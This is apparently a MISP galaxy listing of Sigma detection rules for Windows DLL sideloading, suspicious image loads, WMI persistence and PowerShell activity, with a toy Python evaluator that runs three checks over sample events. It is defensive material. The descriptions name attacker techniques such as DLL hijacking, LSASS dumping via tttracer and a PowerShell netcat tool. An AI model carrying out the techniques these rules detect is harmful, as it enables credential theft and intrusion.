tags ['attack.defense_evasion', 'attack.t1027.002']

Potential DCOM InternetExplorer.Application DLL Hijack - Image Load

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class

Internal MISP references

UUID f354eba5-623b-450f-b073-0b5b2773b6aa which can be used as unique global reference for Potential DCOM InternetExplorer.Application DLL Hijack - Image Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
creation_date 2020/10/12
falsepositive ['Unknown']
filename image_load_iexplore_dcom_iertutil_dll_hijack.yml
level critical
logsource.category image_load
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.t1021.003']

Suspicious Unsigned Thor Scanner Execution

Detects loading and execution of an unsigned THOR scanner binary ("thor.exe").

Internal MISP references

UUID ea5c131b-380d-49f9-aeb3-920694da4d4b which can be used as unique global reference for Suspicious Unsigned Thor Scanner Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/29
falsepositive ['Other legitimate binaries named "thor.exe" that aren\'t published by Nextron Systems']
filename image_load_thor_unsigned_execution.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']

Unsigned Image Loaded Into LSASS Process

Detects an unsigned image (DLL, EXE) being loaded into the LSASS process.

Internal MISP references

UUID 857c8db3-c89b-42fb-882b-f681c7cf4da2 which can be used as unique global reference for Unsigned Image Loaded Into LSASS Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019/10/22
falsepositive ['Valid user connecting using RDP']
filename image_load_lsass_unsigned_image_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

Potential Waveedit.DLL Sideloading

Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.

Internal MISP references

UUID 71b31e99-9ad0-47d4-aeb5-c0ca3928eeeb which can be used as unique global reference for Potential Waveedit.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/14
falsepositive ['Unlikely']
filename image_load_side_load_waveedit.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

DotNet CLR DLL Loaded By Scripting Applications

Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of suspicious execution.

Internal MISP references

UUID 4508a70e-97ef-4300-b62b-ff27992990ea which can be used as unique global reference for DotNet CLR DLL Loaded By Scripting Applications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72, oscd.community
creation_date 2020/10/14
falsepositive ['Unknown']
filename image_load_susp_script_dotnet_clr_dll_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.t1055']

VMMap Unsigned Dbghelp.DLL Potential Sideloading

Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.

Internal MISP references

UUID 273a8dd8-3742-4302-bcc7-7df5a80fe425 which can be used as unique global reference for VMMap Unsigned Dbghelp.DLL Potential Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/28
falsepositive ['Unknown']
filename image_load_side_load_vmmap_dbghelp_unsigned.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Potential CCleanerReactivator.DLL Sideloading

Detects potential DLL sideloading of "CCleanerReactivator.dll"

Internal MISP references

UUID 3735d5ac-d770-4da0-99ff-156b180bc600 which can be used as unique global reference for Potential CCleanerReactivator.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior
creation_date 2023/07/13
falsepositive ['False positives could occur from other custom installation paths. Apply additional filters accordingly.']
filename image_load_side_load_ccleaner_reactivator.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Potential WWlib.DLL Sideloading

Detects potential DLL sideloading of "wwlib.dll"

Internal MISP references

UUID e2e01011-5910-4267-9c3b-4149ed5479cf which can be used as unique global reference for Potential WWlib.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/05/18
falsepositive ['Unknown']
filename image_load_side_load_wwlib.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

PCRE.NET Package Image Load

Detects processes loading modules related to PCRE.NET package

Internal MISP references

UUID 84b0a8f3-680b-4096-a45b-e9a89221727c which can be used as unique global reference for PCRE.NET Package Image Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/29
falsepositive ['Unknown']
filename image_load_dll_pcre_dotnet_dll_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1059']

Time Travel Debugging Utility Usage - Image

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

Internal MISP references

UUID e76c8240-d68f-4773-8880-5c6f63595aaf which can be used as unique global reference for Time Travel Debugging Utility Usage - Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ensar Şamil, @sblmsrsn, @oscd_initiative
creation_date 2020/10/06
falsepositive ['Legitimate usage by software developers/testers']
filename image_load_dll_tttracer_module_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.credential_access', 'attack.t1218', 'attack.t1003.001']

Potential DLL Sideloading Via ClassicExplorer32.dll

Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software

Internal MISP references

UUID caa02837-f659-466f-bca6-48bde2826ab4 which can be used as unique global reference for Potential DLL Sideloading Via ClassicExplorer32.dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/13
falsepositive ['Unknown']
filename image_load_side_load_classicexplorer32.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Potential DLL Sideloading Of DBGHELP.DLL

Detects potential DLL sideloading of "dbghelp.dll"

Internal MISP references

UUID 6414b5cd-b19d-447e-bb5e-9f03940b5784 which can be used as unique global reference for Potential DLL Sideloading Of DBGHELP.DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
creation_date 2022/10/25
falsepositive ['Legitimate applications loading their own versions of the DLL mentioned in this rule']
filename image_load_side_load_dbghelp_dll.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Potential RoboForm.DLL Sideloading

Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager

Internal MISP references

UUID f64c9b2d-b0ad-481d-9d03-7fc75020892a which can be used as unique global reference for Potential RoboForm.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/14
falsepositive ['If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation']
filename image_load_side_load_robform.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

HackTool - SILENTTRINITY Stager DLL Load

Detects SILENTTRINITY stager DLL loading activity

Internal MISP references

UUID 75c505b1-711d-4f68-a357-8c3fe37dbf2d which can be used as unique global reference for HackTool - SILENTTRINITY Stager DLL Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aleksey Potapov, oscd.community
creation_date 2019/10/22
falsepositive ['Unlikely']
filename image_load_hktl_silenttrinity_stager.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071']

Potential Mpclient.DLL Sideloading

Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.

Internal MISP references

UUID 418dc89a-9808-4b87-b1d7-e5ae0cb6effc which can be used as unique global reference for Potential Mpclient.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022/08/02
falsepositive ['Unlikely']
filename image_load_side_load_windows_defender.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']

DLL Loaded From Suspicious Location Via Cmspt.EXE

Detects cmstp.exe loading DLL or OCX files from suspicious locations

Internal MISP references

UUID 75e508f7-932d-4ebc-af77-269237a84ce1 which can be used as unique global reference for DLL Loaded From Suspicious Location Via Cmspt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/30
falsepositive ['Unlikely']
filename image_load_cmstp_load_dll_from_susp_location.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.003']

Potential Libvlc.DLL Sideloading

Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"

Internal MISP references

UUID bf9808c4-d24f-44a2-8398-b65227d406b6 which can be used as unique global reference for Potential Libvlc.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior
creation_date 2023/04/17
falsepositive ['False positives are expected if VLC is installed in non-default locations']
filename image_load_side_load_libvlc.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
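
The image_load rules catalogued on this page all reduce to a handful of checks over Sysmon Event ID 7 fields: a DLL name matched against the path it was loaded from (the sideloading rules, e.g. Potential Libvlc.DLL Sideloading above), a DLL matched against the process that loaded it (PowerShell Core DLL Loaded By Non PowerShell Process), and the Signed flag on modules entering a sensitive process (Unsigned Image Loaded Into LSASS Process). The following Python is an added example written for this page, not Sigma or MISP project code; it runs those three checks over constructed events. The VLC default directories and the list of expected PowerShell host processes are assumptions made for the example, not the exact filters of the published rules.

```python
"""Toy evaluator for the image_load detections catalogued on this page.

Added example (not Sigma project code, not MISP code).  Events use the Sysmon
Event ID 7 field names (Image, ImageLoaded, Signed); the default-directory and
expected-loader lists are assumptions for the example, not the published filters.
"""
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]
Matcher = Callable[[Event], bool]


def _norm(path: str) -> str:
    """Case-insensitive, backslash-only form of a Windows path."""
    return path.replace("/", "\\").lower()


def sideload(dll: str, default_dirs: Tuple[str, ...]) -> Matcher:
    """DLL loaded from anywhere except its expected install directories
    (the check behind the '... DLL Sideloading' rules)."""
    dll_l = "\\" + dll.lower()
    dirs = tuple(_norm(d).rstrip("\\") + "\\" for d in default_dirs)

    def match(e: Event) -> bool:
        loaded = _norm(e.get("ImageLoaded", ""))
        return loaded.endswith(dll_l) and not loaded.startswith(dirs)

    return match


def loaded_by_unexpected(dll: str, expected_loaders: Tuple[str, ...]) -> Matcher:
    """DLL loaded by a process other than the ones that normally host it
    (the check behind 'PowerShell Core DLL Loaded By Non PowerShell Process')."""
    dll_l = "\\" + dll.lower()
    loaders = tuple("\\" + name.lower() for name in expected_loaders)

    def match(e: Event) -> bool:
        loaded = _norm(e.get("ImageLoaded", ""))
        image = _norm(e.get("Image", ""))
        return loaded.endswith(dll_l) and not image.endswith(loaders)

    return match


def unsigned_into(process: str) -> Matcher:
    """Unsigned module loaded into a sensitive process
    (the check behind 'Unsigned Image Loaded Into LSASS Process')."""
    proc = "\\" + process.lower()

    def match(e: Event) -> bool:
        image = _norm(e.get("Image", ""))
        return image.endswith(proc) and e.get("Signed", "").lower() == "false"

    return match


# (title, level, matcher); the directories and loader names are assumed for the example.
RULES: List[Tuple[str, str, Matcher]] = [
    ("Potential Libvlc.DLL Sideloading", "medium",
     sideload("libvlc.dll", (r"C:\Program Files\VideoLAN\VLC",
                             r"C:\Program Files (x86)\VideoLAN\VLC"))),
    ("PowerShell Core DLL Loaded By Non PowerShell Process", "medium",
     loaded_by_unexpected("System.Management.Automation.dll",
                          ("powershell.exe", "powershell_ise.exe", "pwsh.exe"))),
    ("Unsigned Image Loaded Into LSASS Process", "medium",
     unsigned_into("lsass.exe")),
]


def evaluate(events: List[Event], rules=RULES) -> List[Tuple[int, str, str]]:
    """Return (event index, rule title, level) for every rule each event trips."""
    return [(i, title, level)
            for i, e in enumerate(events)
            for title, level, match in rules
            if match(e)]


# Constructed sample events, not real telemetry.
PS_DLL = r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\System.Management.Automation.dll"
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Users\Public\vlc.exe",
     "ImageLoaded": r"C:\Users\Public\libvlc.dll", "Signed": "true"},
    {"Image": r"C:\Program Files\VideoLAN\VLC\vlc.exe",
     "ImageLoaded": r"C:\Program Files\VideoLAN\VLC\libvlc.dll", "Signed": "true"},
    {"Image": r"C:\Windows\Temp\updater.exe", "ImageLoaded": PS_DLL, "Signed": "true"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": PS_DLL, "Signed": "true"},
    {"Image": r"C:\Windows\System32\lsass.exe",
     "ImageLoaded": r"C:\Users\Public\helper.dll", "Signed": "false"},
    {"Image": r"C:\Windows\System32\lsass.exe",
     "ImageLoaded": r"C:\Windows\System32\cryptdll.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for idx, title, level in evaluate(SAMPLE_EVENTS):
        print(f"[{level}] event {idx}: {title}")
```

Only events 0, 2 and 4 fire; events 1, 3 and 5 are the benign counterparts that the same checks must stay silent on. Tuning for the false positives listed in each entry (VLC installed in a non-default location, per-user RoboForm installs under AppData\Local, and so on) means extending the default-directory or expected-loader tuples, which is exactly the "add additional filters" advice the rule authors give.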

Active Directory Parsing DLL Loaded Via Office Application

Detects DSParse DLL being loaded by an Office Product

Internal MISP references

UUID a2a3b925-7bb0-433b-b508-db9003263cc4 which can be used as unique global reference for Active Directory Parsing DLL Loaded Via Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb
creation_date 2020/02/19
falsepositive ['Unknown']
filename image_load_office_dsparse_dll_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']

PowerShell Core DLL Loaded Via Office Application

Detects PowerShell core DLL being loaded by an Office Product

Internal MISP references

UUID bb2ba6fb-95d4-4a25-89fc-30bb736c021a which can be used as unique global reference for PowerShell Core DLL Loaded Via Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/01
falsepositive ['Unknown']
filename image_load_office_powershell_dll_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion']

Potential SmadHook.DLL Sideloading

Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus

Internal MISP references

UUID 24b6cf51-6122-469e-861a-22974e9c1e5b which can be used as unique global reference for Potential SmadHook.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/01
falsepositive ['Unlikely']
filename image_load_side_load_smadhook.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

DLL Load By System Process From Suspicious Locations

Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"

Internal MISP references

UUID 9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c which can be used as unique global reference for DLL Load By System Process From Suspicious Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/17
falsepositive ['Unknown']
filename image_load_susp_dll_load_system_process.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']

Potential Edputil.DLL Sideloading

Detects potential DLL sideloading of "edputil.dll"

Internal MISP references

UUID e4903324-1a10-4ed3-981b-f6fe3be3a2c2 which can be used as unique global reference for Potential Edputil.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/09
falsepositive ['Unlikely']
filename image_load_side_load_edputil.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

GAC DLL Loaded Via Office Applications

Detects any GAC DLL being loaded by an Office Product

Internal MISP references

UUID 90217a70-13fc-48e4-b3db-0d836c5824ac which can be used as unique global reference for GAC DLL Loaded Via Office Applications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb
creation_date 2020/02/19
falsepositive ['Legitimate macro usage. Add the appropriate filter according to your environment']
filename image_load_office_dotnet_gac_dll_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']

DLL Sideloading Of ShellChromeAPI.DLL

Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary, which, when run with the "PhoneDeepLink" flag, tries to load this DLL. Adversaries can drop their own renamed DLL and have it executed via DeviceEnroller.exe using this parameter

Internal MISP references

UUID ee4c5d06-3abc-48cc-8885-77f1c20f4451 which can be used as unique global reference for DLL Sideloading Of ShellChromeAPI.DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/01
falsepositive ['Unknown']
filename image_load_side_load_shell_chrome_api.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Potential Iviewers.DLL Sideloading

Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)

Internal MISP references

UUID 4c21b805-4dd7-469f-b47d-7383a8fcb437 which can be used as unique global reference for Potential Iviewers.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/03/21
falsepositive ['Unknown']
filename image_load_side_load_iviewers.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Suspicious Volume Shadow Copy Vsstrace.dll Load

Detects the image load of the VSS DLL (vsstrace.dll) by uncommon executables

Internal MISP references

UUID 48bfd177-7cf2-412b-ad77-baf923489e82 which can be used as unique global reference for Suspicious Volume Shadow Copy Vsstrace.dll Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/02/17
falsepositive ['Unknown']
filename image_load_dll_vsstrace_susp_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1490']

Active Directory Kerberos DLL Loaded Via Office Application

Detects Kerberos DLL being loaded by an Office Product

Internal MISP references

UUID 7417e29e-c2e7-4cf6-a2e8-767228c64837 which can be used as unique global reference for Active Directory Kerberos DLL Loaded Via Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb
creation_date 2020/02/19
falsepositive ['Unknown']
filename image_load_office_kerberos_dll_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']

Wmiprvse Wbemcomn DLL Hijack

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL Hijack scenario.

Internal MISP references

UUID 7707a579-e0d8-4886-a853-ce47e4575aaa which can be used as unique global reference for Wmiprvse Wbemcomn DLL Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/12
falsepositive ['Unknown']
filename image_load_wmiprvse_wbemcomn_dll_hijack.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.lateral_movement', 'attack.t1021.002']

Microsoft VBA For Outlook Addin Loaded Via Outlook

Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process

Internal MISP references

UUID 9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed which can be used as unique global reference for Microsoft VBA For Outlook Addin Loaded Via Outlook in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/08
falsepositive ['Legitimate macro usage. Add the appropriate filter according to your environment']
filename image_load_office_outlook_outlvba_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']

Windows Spooler Service Suspicious Binary Load

Detects a DLL load from the Spooler Service backup folder

Internal MISP references

UUID 02fb90de-c321-4e63-a6b9-25f4b03dfd14 which can be used as unique global reference for Windows Spooler Service Suspicious Binary Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author FPT.EagleEye, Thomas Patzke (improvements)
creation_date 2021/06/29
falsepositive ['Loading of legitimate driver']
filename image_load_spoolsv_dll_load.yml
level informational
logsource.category image_load
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574', 'cve.2021.1675', 'cve.2021.34527']

Microsoft Office DLL Sideload

Detects DLL sideloading of DLLs that are part of Microsoft Office from a non-standard location

Internal MISP references

UUID 829a3bdf-34da-4051-9cf4-8ed221a8ae4f which can be used as unique global reference for Microsoft Office DLL Sideload in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
creation_date 2022/08/17
falsepositive ['Unlikely']
filename image_load_side_load_office_dlls.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE

Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location

Internal MISP references

UUID e49b5745-1064-4ac1-9a2e-f687bc2dd37e which can be used as unique global reference for Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Unknown']
filename image_load_side_load_gup_libcurl.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

VBA DLL Loaded Via Office Application

Detects VB DLLs loaded by an Office application, which could indicate the presence of VBA macros.

Internal MISP references

UUID e6ce8457-68b1-485b-9bdd-3c2b5d679aa9 which can be used as unique global reference for VBA DLL Loaded Via Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb
creation_date 2020/02/19
falsepositive ['Legitimate macro usage. Add the appropriate filter according to your environment']
filename image_load_office_vbadll_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']

Potential Chrome Frame Helper DLL Sideloading

Detects potential DLL sideloading of "chrome_frame_helper.dll"

Internal MISP references

UUID 72ca7c75-bf85-45cd-aca7-255d360e423c which can be used as unique global reference for Potential Chrome Frame Helper DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
creation_date 2022/08/17
falsepositive ['Unknown']
filename image_load_side_load_chrome_frame_helper.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']

CLR DLL Loaded Via Office Applications

Detects CLR DLL being loaded by an Office Product

Internal MISP references

UUID d13c43f0-f66b-4279-8b2c-5912077c1780 which can be used as unique global reference for CLR DLL Loaded Via Office Applications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb
creation_date 2020/02/19
falsepositive ['Unknown']
filename image_load_office_dotnet_clr_dll_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']

CredUI.DLL Loaded By Uncommon Process

Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".

Internal MISP references

UUID 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 which can be used as unique global reference for CredUI.DLL Loaded By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/20
falsepositive ['Other legitimate processes loading those DLLs in your environment.']
filename image_load_dll_credui_uncommon_process_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.credential_access', 'attack.collection', 'attack.t1056.002']

Suspicious Encoded Scripts in a WMI Consumer

Detects suspicious encoded payloads in WMI Event Consumers

Internal MISP references

UUID 83844185-1c5b-45bc-bcf3-b5bf3084ca5b which can be used as unique global reference for Suspicious Encoded Scripts in a WMI Consumer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/09/01
falsepositive ['Unknown']
filename sysmon_wmi_susp_encoded_scripts.yml
level high
logsource.category wmi_event
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.persistence', 'attack.t1546.003']

WMI Event Subscription

Detects creation of a WMI event subscription, a persistence method

Internal MISP references

UUID 0f06a3a5-6a09-413f-8743-e6cf35561297 which can be used as unique global reference for WMI Event Subscription in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Ueltschi (@c_APT_ure)
creation_date 2019/01/12
falsepositive ['Exclude legitimate (vetted) use of WMI event subscription in your network']
filename sysmon_wmi_event_subscription.yml
level medium
logsource.category wmi_event
logsource.product windows
tags ['attack.persistence', 'attack.t1546.003']

Suspicious Scripting in a WMI Consumer

Detects suspicious commands related to scripting/PowerShell in WMI Event Consumers

Internal MISP references

UUID fe21810c-2a8c-478f-8dd3-5a287fb2a0e0 which can be used as unique global reference for Suspicious Scripting in a WMI Consumer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro
creation_date 2019/04/15
falsepositive ['Legitimate administrative scripts']
filename sysmon_wmi_susp_scripting.yml
level high
logsource.category wmi_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.005']

Netcat The Powershell Version

Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network

Internal MISP references

UUID c5b20776-639a-49bf-94c7-84f912b91c15 which can be used as unique global reference for Netcat The Powershell Version in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/21
falsepositive ['Unknown']
filename posh_pc_powercat.yml
level medium
logsource.category ps_classic_start
logsource.product windows
tags ['attack.command_and_control', 'attack.t1095']

Suspicious Non PowerShell WSMAN COM Provider

Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.

Internal MISP references

UUID df9a0e0e-fedb-4d6c-8668-d765dfc92aa7 which can be used as unique global reference for Suspicious Non PowerShell WSMAN COM Provider in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/06/24
falsepositive ['Unknown']
filename posh_pc_wsman_com_provider_no_powershell.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.lateral_movement', 'attack.t1021.003']

Use Get-NetTCPConnection

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

Internal MISP references

UUID b366adb4-d63d-422d-8a2c-186463b5ded0 which can be used as unique global reference for Use Get-NetTCPConnection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Unknown']
filename posh_pc_susp_get_nettcpconnection.yml
level low
logsource.category ps_classic_start
logsource.product windows
tags ['attack.discovery', 'attack.t1049']

Remote PowerShell Session (PS Classic)

Detects remote PowerShell sessions

Internal MISP references

UUID 60167e5c-84b2-4c95-a7ac-86281f27c445 which can be used as unique global reference for Remote PowerShell Session (PS Classic) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/10
falsepositive ['Legitimate use remote PowerShell sessions']
filename posh_pc_remote_powershell_session.yml
level low
logsource.category ps_classic_start
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.lateral_movement', 'attack.t1021.006']

PowerShell Called from an Executable Version Mismatch

Detects PowerShell called from an executable by the version mismatch method

Internal MISP references

